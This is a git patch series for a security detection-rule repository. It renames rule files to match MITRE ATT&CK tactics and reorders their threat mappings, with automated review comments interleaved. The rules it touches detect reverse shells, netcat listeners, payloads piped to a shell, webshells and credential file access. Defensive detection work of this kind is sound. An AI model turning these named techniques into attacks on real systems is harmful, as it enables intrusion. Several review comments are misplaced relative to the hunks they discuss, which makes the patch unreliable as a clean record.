diff --git a/rules/linux/persistence_git_hook_process_execution.toml b/rules/linux/execution_git_hook_process_execution.toml
similarity index 100%
rename from rules/linux/persistence_git_hook_process_execution.toml
rename to rules/linux/execution_git_hook_process_execution.toml
diff --git a/rules/linux/defense_evasion_interactive_shell_from_system_user.toml b/rules/linux/execution_interactive_shell_from_system_user.toml
similarity index 100%
rename from rules/linux/defense_evasion_interactive_shell_from_system_user.toml
rename to rules/linux/execution_interactive_shell_from_system_user.toml
diff --git a/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml b/rules/linux/execution_potential_wildcard_shell_spawn.toml
similarity index 100%
rename from rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml
rename to rules/linux/execution_potential_wildcard_shell_spawn.toml
diff --git a/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml b/rules/linux/execution_suspicious_ssh_execution_xzbackdoor.toml
similarity index 100%
rename from rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml
rename to rules/linux/execution_suspicious_ssh_execution_xzbackdoor.toml
diff --git a/rules/linux/persistence_systemd_service_started.toml b/rules/linux/execution_systemd_service_started.toml
similarity index 100%
rename from rules/linux/persistence_systemd_service_started.toml
rename to rules/linux/execution_systemd_service_started.toml
diff --git a/rules/linux/persistence_systemd_shell_execution.toml b/rules/linux/execution_systemd_shell_execution.toml
similarity index 100%
rename from rules/linux/persistence_systemd_shell_execution.toml
rename to rules/linux/execution_systemd_shell_execution.toml
diff --git a/rules/linux/persistence_unusual_exim4_child_process.toml b/rules/linux/execution_unusual_exim4_child_process.toml
similarity index 100%
rename from rules/linux/persistence_unusual_exim4_child_process.toml
rename to rules/linux/execution_unusual_exim4_child_process.toml
diff --git a/rules/linux/persistence_web_server_sus_child_spawned.toml b/rules/linux/execution_web_server_sus_child_spawned.toml
similarity index 100%
rename from rules/linux/persistence_web_server_sus_child_spawned.toml
rename to rules/linux/execution_web_server_sus_child_spawned.toml
diff --git a/rules/linux/persistence_web_server_sus_command_execution.toml b/rules/linux/execution_web_server_sus_command_execution.toml
similarity index 100%
rename from rules/linux/persistence_web_server_sus_command_execution.toml
rename to rules/linux/execution_web_server_sus_command_execution.toml
diff --git a/rules/linux/persistence_web_server_unusual_command_execution.toml b/rules/linux/execution_web_server_unusual_command_execution.toml
similarity index 100%
rename from rules/linux/persistence_web_server_unusual_command_execution.toml
rename to rules/linux/execution_web_server_unusual_command_execution.toml
diff --git a/rules/linux/defense_evasion_authorized_keys_file_deletion.toml b/rules/linux/impact_authorized_keys_file_deletion.toml
similarity index 100%
rename from rules/linux/defense_evasion_authorized_keys_file_deletion.toml
rename to rules/linux/impact_authorized_keys_file_deletion.toml
diff --git a/rules/linux/defense_evasion_rename_esxi_files.toml b/rules/linux/impact_rename_esxi_files.toml
similarity index 100%
rename from rules/linux/defense_evasion_rename_esxi_files.toml
rename to rules/linux/impact_rename_esxi_files.toml
diff --git a/rules/linux/execution_suspicious_mining_process_creation_events.toml b/rules/linux/impact_suspicious_mining_process_creation_events.toml
similarity index 100%
rename from rules/linux/execution_suspicious_mining_process_creation_events.toml
rename to rules/linux/impact_suspicious_mining_process_creation_events.toml
diff --git a/rules/linux/defense_evasion_user_or_group_deletion.toml b/rules/linux/impact_user_or_group_deletion.toml
similarity index 100%
rename from rules/linux/defense_evasion_user_or_group_deletion.toml
rename to rules/linux/impact_user_or_group_deletion.toml
diff --git a/rules/linux/persistence_linux_shell_activity_via_web_server.toml b/rules/linux/initial_access_linux_shell_activity_via_web_server.toml
similarity index 100%
rename from rules/linux/persistence_linux_shell_activity_via_web_server.toml
rename to rules/linux/initial_access_linux_shell_activity_via_web_server.toml
diff --git a/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml b/rules/linux/initial_access_potential_bufferoverflow_attack.toml
similarity index 100%
rename from rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml
rename to rules/linux/initial_access_potential_bufferoverflow_attack.toml
diff --git a/rules/linux/persistence_ssh_via_backdoored_system_user.toml b/rules/linux/initial_access_ssh_via_backdoored_system_user.toml
similarity index 100%
rename from rules/linux/persistence_ssh_via_backdoored_system_user.toml
rename to rules/linux/initial_access_ssh_via_backdoored_system_user.toml
diff --git a/rules/linux/persistence_unusual_sshd_child_process.toml b/rules/linux/lateral_movement_unusual_sshd_child_process.toml
similarity index 100%
rename from rules/linux/persistence_unusual_sshd_child_process.toml
rename to rules/linux/lateral_movement_unusual_sshd_child_process.toml
diff --git a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml b/rules/linux/persistence_ld_preload_shared_object_modif.toml
similarity index 100%
rename from rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml
rename to rules/linux/persistence_ld_preload_shared_object_modif.toml
diff --git a/rules/linux/defense_evasion_ld_so_creation.toml b/rules/linux/persistence_ld_so_creation.toml
similarity index 100%
rename from rules/linux/defense_evasion_ld_so_creation.toml
rename to rules/linux/persistence_ld_so_creation.toml
diff --git a/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml b/rules/linux/persistence_linux_suspicious_symbolic_link.toml
similarity index 100%
rename from rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml
rename to rules/linux/persistence_linux_suspicious_symbolic_link.toml
diff --git a/rules/linux/privilege_escalation_sudo_hijacking.toml b/rules/linux/persistence_sudo_hijacking.toml
similarity index 100%
rename from rules/linux/privilege_escalation_sudo_hijacking.toml
rename to rules/linux/persistence_sudo_hijacking.toml
diff --git a/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml b/rules/linux/persistence_suspicious_passwd_file_write.toml
similarity index 100%
rename from rules/linux/privilege_escalation_suspicious_passwd_file_write.toml
rename to rules/linux/persistence_suspicious_passwd_file_write.toml
diff --git a/rules/linux/persistence_process_capability_set_via_setcap.toml b/rules/linux/privilege_escalation_process_capability_set_via_setcap.toml
similarity index 100%
rename from rules/linux/persistence_process_capability_set_via_setcap.toml
rename to rules/linux/privilege_escalation_process_capability_set_via_setcap.toml
diff --git a/rules/linux/persistence_setuid_setgid_capability_set.toml b/rules/linux/privilege_escalation_setuid_setgid_capability_set.toml
similarity index 100%
rename from rules/linux/persistence_setuid_setgid_capability_set.toml
rename to rules/linux/privilege_escalation_setuid_setgid_capability_set.toml
diff --git a/rules/linux/execution_unusual_pkexec_execution.toml b/rules/linux/privilege_escalation_unusual_pkexec_execution.toml
similarity index 100%
rename from rules/linux/execution_unusual_pkexec_execution.toml
rename to rules/linux/privilege_escalation_unusual_pkexec_execution.toml
From bf5b1587abb6a9a6cfbb72625c6532bbc08dbe5e Mon Sep 17 00:00:00 2001
From: Ruben Groenewoud Date: Tue, 24 Mar 2026 10:41:14 +0100 Subject: [PATCH 05/16] ++ --- ...ntrol_register_github_actions_runner.toml} | 0 ...and_control_revershell_via_shell_cmd.toml} | 0 ...s_followed_by_kubernetes_api_request.toml} | 0 ...r_tracking_id_tampering_via_env_vars.toml} | 0 ...netes_api_request_by_usual_utilities.toml} | 0 ...t_interactive_kubernetes_api_request.toml} | 0 ...es_api_activity_by_unusual_utilities.toml} | 0 ...ccess_execution_susp_react_serv_child.toml | 24 ++++++------- ...server_local_file_inclusion_activity.toml} | 24 ++++++------- ...erver_remote_file_inclusion_activity.toml} | 0 ...rsistence_sap_netweaver_jsp_webshell.toml} | 0 ...eb_server_potential_command_injection.toml | 24 ++++++------- ...lege_escalation_echo_nopasswd_sudoers.toml | 13 ++++--- ...ation_setuid_setgid_bit_set_via_chmod.toml | 12 +++---- ...files_compression_inside_a_container.toml} | 0 ...creation_execution_deletion_sequence.toml} | 0 ..._creation_in_system_binary_locations.toml} | 0 ...tener_established_inside_a_container.toml} | 0 ...ayload_downloaded_and_piped_to_shell.toml} | 0 ...cess_kubelet_certificate_file_access.toml} | 0 ...cutable_via_chmod_inside_a_container.toml} | 0 ...t_interactive_kubernetes_api_request.toml} | 0 .../execution_kubeletctl_execution.toml | 24 ++++++------- ..._suspicious_echo_or_printf_execution.toml} | 36 +++++++++---------- ...us_webserver_child_process_execution.toml} | 0 ...rect_kubelet_access_via_process_args.toml} | 24 ++++++------- 26 files changed, 90 insertions(+), 91 deletions(-) rename rules/cross-platform/{execution_register_github_actions_runner.toml => command_and_control_register_github_actions_runner.toml} (100%) rename rules/cross-platform/{execution_revershell_via_shell_cmd.toml => command_and_control_revershell_via_shell_cmd.toml} (100%) rename rules/cross-platform/{execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml => 
credential_access_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml} (100%) rename rules/cross-platform/{execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml => defense_evasion_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml} (100%) rename rules/cross-platform/{execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml => discovery_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml} (100%) rename rules/cross-platform/{execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml => discovery_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml} (100%) rename rules/cross-platform/{execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml => discovery_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml} (100%) rename rules/cross-platform/{discovery_web_server_local_file_inclusion_activity.toml => initial_access_web_server_local_file_inclusion_activity.toml} (100%) rename rules/cross-platform/{discovery_web_server_remote_file_inclusion_activity.toml => initial_access_web_server_remote_file_inclusion_activity.toml} (100%) rename rules/cross-platform/{execution_sap_netweaver_jsp_webshell.toml => persistence_sap_netweaver_jsp_webshell.toml} (100%) rename rules/integrations/cloud_defend/{credential_access_collection_sensitive_files_compression_inside_a_container.toml => collection_collection_sensitive_files_compression_inside_a_container.toml} (100%) rename rules/integrations/cloud_defend/{defense_evasion_file_creation_execution_deletion_cradle.toml => command_and_control_file_creation_execution_deletion_sequence.toml} (100%) rename rules/integrations/cloud_defend/{execution_interactive_file_creation_in_system_binary_locations.toml => command_and_control_interactive_file_creation_in_system_binary_locations.toml} (100%) rename 
rules/integrations/cloud_defend/{execution_netcat_listener_established_inside_a_container.toml => command_and_control_netcat_listener_established_inside_a_container.toml} (100%) rename rules/integrations/cloud_defend/{execution_payload_downloaded_and_piped_to_shell.toml => command_and_control_payload_downloaded_and_piped_to_shell.toml} (100%) rename rules/integrations/cloud_defend/{discovery_kubelet_certificate_file_access.toml => credential_access_kubelet_certificate_file_access.toml} (100%) rename rules/integrations/cloud_defend/{execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml => defense_evasion_suspicious_file_made_executable_via_chmod_inside_a_container.toml} (100%) rename rules/integrations/cloud_defend/{execution_direct_interactive_kubernetes_api_request.toml => discovery_direct_interactive_kubernetes_api_request.toml} (100%) rename rules/integrations/cloud_defend/{persistence_suspicious_echo_or_printf_execution.toml => execution_suspicious_echo_or_printf_execution.toml} (100%) rename rules/integrations/cloud_defend/{persistence_suspicious_webserver_child_process_execution.toml => execution_suspicious_webserver_child_process_execution.toml} (100%) rename rules/integrations/cloud_defend/{execution_potential_direct_kubelet_access_via_process_args.toml => lateral_movement_potential_direct_kubelet_access_via_process_args.toml} (100%) diff --git a/rules/cross-platform/execution_register_github_actions_runner.toml b/rules/cross-platform/command_and_control_register_github_actions_runner.toml similarity index 100% rename from rules/cross-platform/execution_register_github_actions_runner.toml rename to rules/cross-platform/command_and_control_register_github_actions_runner.toml 
diff --git a/rules/cross-platform/execution_revershell_via_shell_cmd.toml b/rules/cross-platform/command_and_control_revershell_via_shell_cmd.toml
similarity index 100%
rename from rules/cross-platform/execution_revershell_via_shell_cmd.toml
rename to rules/cross-platform/command_and_control_revershell_via_shell_cmd.toml
diff --git a/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml b/rules/cross-platform/credential_access_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml
similarity index 100%
rename from rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml
rename to rules/cross-platform/credential_access_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml
diff --git a/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml b/rules/cross-platform/defense_evasion_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml
similarity index 100%
rename from rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml
rename to rules/cross-platform/defense_evasion_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml
diff --git a/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml b/rules/cross-platform/discovery_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml
similarity index 100%
rename from rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml
rename to rules/cross-platform/discovery_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml
diff --git a/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml b/rules/cross-platform/discovery_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml
similarity index 100%
rename from rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml
rename to rules/cross-platform/discovery_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml
diff --git a/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml b/rules/cross-platform/discovery_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml
similarity index 100%
rename from rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml
rename to rules/cross-platform/discovery_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml
diff --git a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml
index 4ec8cccbe6a..a4661528dc3 100644
--- a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml
+++ b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml
@@ -107,24 +107,24 @@ and (
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1190"
-name = "Exploit Public-Facing Application"
-reference = "https://attack.mitre.org/techniques/T1190/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
 [rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml b/rules/cross-platform/initial_access_web_server_local_file_inclusion_activity.toml
similarity index 100%
rename from rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml
rename to rules/cross-platform/initial_access_web_server_local_file_inclusion_activity.toml
index 62546661360..2cca4c558fb 100644
--- a/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml
+++ b/rules/cross-platform/initial_access_web_server_local_file_inclusion_activity.toml
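Review bot: The file keeps the double prefix `initial_access_execution_susp_react_serv_child.toml` even though after this swap Initial Access alone is the first `[[rule.threat]]` entry, so the name still encodes a tactic that is no longer primary, unlike the single-prefix renames elsewhere in this commit; if the convention is that the prefix mirrors the first threat entry, dropping the `execution_` segment (e.g. `initial_access_susp_react_serv_child.toml`, a constructed name) would keep it uniform. The same move-to-first pattern appears in the local_file_inclusion, command_injection, sudoers, setuid_setgid, kubeletctl, echo_or_printf and kubelet_access hunks of this commit, and nothing in the TOML marks the first entry as load-bearing; a short comment above the first `[[rule.threat]]` such as `# first entry is the rule's primary tactic and is mirrored by the filename prefix`, or better a test that compares the filename prefix with the first tactic, would stop a later edit from silently reordering it. The rule's `tags` block is outside the hunk; since only the order changed, the set of tactics it must cover is unchanged.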
@@ -154,24 +154,24 @@ from
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1005"
-name = "Data from Local System"
-reference = "https://attack.mitre.org/techniques/T1005/"
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
 [rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1190"
-name = "Exploit Public-Facing Application"
-reference = "https://attack.mitre.org/techniques/T1190/"
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
 [rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml b/rules/cross-platform/initial_access_web_server_remote_file_inclusion_activity.toml
similarity index 100%
rename from rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml
rename to rules/cross-platform/initial_access_web_server_remote_file_inclusion_activity.toml
diff --git a/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml b/rules/cross-platform/persistence_sap_netweaver_jsp_webshell.toml
similarity index 100%
rename from rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml
rename to rules/cross-platform/persistence_sap_netweaver_jsp_webshell.toml
diff --git a/rules/cross-platform/persistence_web_server_potential_command_injection.toml b/rules/cross-platform/persistence_web_server_potential_command_injection.toml
index 144a469096a..d85ff3962b0 100644
--- a/rules/cross-platform/persistence_web_server_potential_command_injection.toml
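Review bot: The sibling rule `discovery_web_server_remote_file_inclusion_activity.toml` is renamed to `initial_access_` in the same commit with similarity 100% and no threat hunk, whereas this LFI rule needed its Initial Access entry moved to the front; worth confirming that the RFI rule's first `[[rule.threat]]` is already Initial Access, otherwise the two siblings now follow different conventions for the same prefix. The header above shows `similarity index 100%` next to a content hunk, which git does not emit for a modified rename, so the figure presumably was lost in rendering rather than being a defect in the change.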
+++ b/rules/cross-platform/persistence_web_server_potential_command_injection.toml
@@ -144,24 +144,24 @@ from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, log
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1190"
-name = "Exploit Public-Facing Application"
-reference = "https://attack.mitre.org/techniques/T1190/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
 [rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml
index ed89b2cff74..34ef2593638 100644
--- a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml
+++ b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml
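Review bot: After this swap the first `[[rule.threat]]` entry is Initial Access, but the file is still `persistence_web_server_potential_command_injection.toml` in this commit, so filename prefix and primary tactic disagree until the next commit in the series, whose diffstat shows `=> initial_access_web_server_potential_command_injection.toml`. Folding that rename into this commit would keep each commit self-consistent and bisectable under the naming convention the rest of the series applies. The swap itself is the same two entries byte-for-byte in reverse order, identical to the react_serv_child hunk above.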
@@ -61,7 +61,6 @@ The sudoers file is crucial in Unix-like systems, defining user permissions for - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if the threat has spread to other systems. - Implement additional logging and alerting for changes to the sudoers file and other critical configuration files to enhance detection of similar threats in the future.""" - [[rule.threat]] framework = "MITRE ATT&CK" @@ -76,9 +75,9 @@ name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -94,6 +93,6 @@ name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml index 86ff78db35a..967af209153 100644 --- a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml +++ b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml @@ -92,9 +92,9 @@ name = "Setuid and Setgid" reference = "https://attack.mitre.org/techniques/T1548/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" 
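Review bot: The first hunk in `privilege_escalation_echo_nopasswd_sudoers.toml` (`@@ -61,7 +61,6 @@`) appears to delete only a blank line after the closing `"""` of the note text, an unrelated whitespace cleanup bundled into a tactic-reorder commit; the setuid/setgid rule on the same line gets no such cleanup, so either apply it consistently or keep it out of this change. The remaining sudoers and setuid hunks are an exact swap of the Defense Evasion and Privilege Escalation entries that share the T1548 sub-technique, with no content change, so the rules' existing `tags` (outside the hunk) still cover the same tactic set.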
@@ -110,6 +110,6 @@ name = "Setuid and Setgid"
 reference = "https://attack.mitre.org/techniques/T1548/001/"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml b/rules/integrations/cloud_defend/collection_collection_sensitive_files_compression_inside_a_container.toml
similarity index 100%
rename from rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml
rename to rules/integrations/cloud_defend/collection_collection_sensitive_files_compression_inside_a_container.toml
diff --git a/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml b/rules/integrations/cloud_defend/command_and_control_file_creation_execution_deletion_sequence.toml
similarity index 100%
rename from rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml
rename to rules/integrations/cloud_defend/command_and_control_file_creation_execution_deletion_sequence.toml
diff --git a/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml b/rules/integrations/cloud_defend/command_and_control_interactive_file_creation_in_system_binary_locations.toml
similarity index 100%
rename from rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml
rename to rules/integrations/cloud_defend/command_and_control_interactive_file_creation_in_system_binary_locations.toml
diff --git a/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml b/rules/integrations/cloud_defend/command_and_control_netcat_listener_established_inside_a_container.toml
similarity index 100%
rename from rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml
rename to rules/integrations/cloud_defend/command_and_control_netcat_listener_established_inside_a_container.toml
diff --git a/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml b/rules/integrations/cloud_defend/command_and_control_payload_downloaded_and_piped_to_shell.toml
similarity index 100%
rename from rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml
rename to rules/integrations/cloud_defend/command_and_control_payload_downloaded_and_piped_to_shell.toml
diff --git a/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml b/rules/integrations/cloud_defend/credential_access_kubelet_certificate_file_access.toml
similarity index 100%
rename from rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml
rename to rules/integrations/cloud_defend/credential_access_kubelet_certificate_file_access.toml
diff --git a/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml b/rules/integrations/cloud_defend/defense_evasion_suspicious_file_made_executable_via_chmod_inside_a_container.toml
similarity index 100%
rename from rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml
rename to rules/integrations/cloud_defend/defense_evasion_suspicious_file_made_executable_via_chmod_inside_a_container.toml
diff --git a/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml b/rules/integrations/cloud_defend/discovery_direct_interactive_kubernetes_api_request.toml
similarity index 100%
rename from rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml
rename to rules/integrations/cloud_defend/discovery_direct_interactive_kubernetes_api_request.toml
diff --git a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml
index 9ecd8a31745..34f7b454378 100644
--- a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml
+++ b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml
@@ -88,24 +88,24 @@ process.interactive == true and container.id like "?*"
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
+id = "T1609"
+name = "Container Administration Command"
+reference = "https://attack.mitre.org/techniques/T1609/"
 [rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1609"
-name = "Container Administration Command"
-reference = "https://attack.mitre.org/techniques/T1609/"
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml b/rules/integrations/cloud_defend/execution_suspicious_echo_or_printf_execution.toml
similarity index 100%
rename from rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml
rename to rules/integrations/cloud_defend/execution_suspicious_echo_or_printf_execution.toml
index 379f019ead4..c6a0847d380 100644
--- a/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml
+++ b/rules/integrations/cloud_defend/execution_suspicious_echo_or_printf_execution.toml
@@ -76,6 +76,24 @@ process.args like (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1095"
 name = "Non-Application Layer Protocol"
@@ -102,24 +120,6 @@ reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1037"
 name = "Boot or Logon Initialization Scripts"
diff --git a/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml b/rules/integrations/cloud_defend/execution_suspicious_webserver_child_process_execution.toml
similarity index 100%
rename from rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml
rename to rules/integrations/cloud_defend/execution_suspicious_webserver_child_process_execution.toml
